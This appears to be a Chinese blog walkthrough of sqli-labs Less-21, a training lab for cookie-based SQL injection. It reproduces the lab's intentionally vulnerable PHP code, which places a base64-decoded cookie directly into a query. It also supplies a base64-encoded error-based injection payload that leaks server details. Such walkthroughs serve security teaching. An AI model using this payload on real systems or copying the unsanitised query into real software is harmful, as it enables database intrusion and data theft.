sqli-labs————less 21

Less-21

sqli-labs————less 21_第1张图片

做一个简单测试:
username:admin
password:aaa

sqli-labs————less 21_第2张图片

这里的界面和上一关的内容差不多,唯一的区别就是cookie使用了base64进行了加密,这里我们贴出该关的代码:






Less-21 Cookie Injection- Error Based- complex - string


 Welcome    Dhakkan 
"; echo "
"; echo "
"; echo ""; echo '
'; echo '
Username :    '; echo '
'; echo '
Password :      '; echo '

'; echo '
'; echo '
'; echo '
'; echo '
'; echo '
'; echo ''; echo '



'; echo ''; echo '
'; function check_input($value) { if(!empty($value)) { $value = substr($value,0,20); // truncation (see comments) } if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled { $value = stripslashes($value); } if (!ctype_digit($value)) // Quote if not a number { $value = "'" . mysql_real_escape_string($value) . "'"; } else { $value = intval($value); } return $value; } echo "
"; echo "
"; if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; $result1 = mysql_query($sql); $row1 = mysql_fetch_array($result1); if($row1) { echo ''; setcookie('uname', base64_encode($row1['username']), time()+3600); echo "I LOVE YOU COOKIES"; echo ""; echo ''; //echo 'Your Cookie is: ' .$cookee; echo ""; echo "
"; print_r(mysql_error()); echo "

"; echo ''; echo "
"; header ('Location: index.php'); } else { echo ''; //echo "Try again looser"; print_r(mysql_error()); echo "
"; echo "
"; echo ''; echo "
"; } } echo "
"; echo ''; echo '
'; } else { if(!isset($_POST['submit'])) { $cookee = $_COOKIE['uname']; $format = 'D d M Y - H:i:s'; $timestamp = time() + 3600; echo "
"; echo "


"; echo ''; echo "

"; echo '
'; echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT']; echo "
"; echo ''; echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR']; echo "
"; echo ''; echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE
"; echo ''; echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp); $cookee = base64_decode($cookee); echo "
"; $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1"; $result=mysql_query($sql); if (!$result) { die('Issue with your mysql: ' . mysql_error()); } $row = mysql_fetch_array($result); if($row) { echo ''; echo 'Your Login name:'. $row['username']; echo "
"; echo ''; echo 'Your Password:' .$row['password']; echo "
"; echo "
"; echo 'Your ID:' .$row['id']; } else { echo "
"; echo '


'; echo ''; echo "

"; //echo ''; } echo '
'; echo '
'; echo ''; echo '
'; echo '
'; } else { echo '
'; echo "
"; echo "
"; echo "
"; echo "
"; echo "
"; echo "
"; echo ''; echo " Your Cookie is deleted"; setcookie('uname', base64_encode($row1['username']), time()-3600); header ('Location: index.php'); echo '

'; } echo "
"; echo "
"; //header ('Location: main.php'); echo "
"; echo "
"; //echo '
'; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'Cookie:'.$cookee."\n"); fclose($fp); } ?>

我们这里与上一关一样,修改cookie即可,唯一的附加内容就是将cookie进行base64加密:

cookie值为:

YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpKSM=
sqli-labs————less 21_第3张图片

这里开启了了print-r(mysql_error)所以,可以使用报错注入获取你所想要的各种信息,这里就不再多做介绍了。

你可能感兴趣的:(【信息安全】,———Sqli-labs实战,【渗透测试实战1】)